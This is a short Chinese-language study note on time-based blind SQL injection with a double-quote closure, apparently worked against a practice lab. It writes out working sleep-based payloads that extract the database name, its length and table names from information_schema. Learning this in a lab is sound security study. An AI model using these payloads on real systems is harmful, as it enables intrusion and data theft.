现实证明 英语好才能学渗透
基于bool类型的时间盲注 双引号
0X01爱之初体验
说实话我还没有找到 盲注的时候怎么判断闭合的方法
so 这里我直接看源码
这里的语句应该是 (“”)这种的闭合形式
so我们尝试一下
") and if(ascii(substr((select database()) ,1,1))>116,1,sleep(5))#
看看能能不正常执行
那来试试这个
") and if(ascii(substr((select database()) ,1,1))=115,1,sleep(5))#
正确的时候响应是一秒钟 所以存在时间注入
那我们来尝试一下爆破数据库名的长度
admin") and if(length((select database()))>8,1,sleep(5))#
然后后面的方法就一样看
那我们来尝试一下爆破 第一个表的第一个字母
admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,0,sleep(5))#
nice 后面构造语法就行
切记 学习之路 无浮躁
少就是多 慢就是快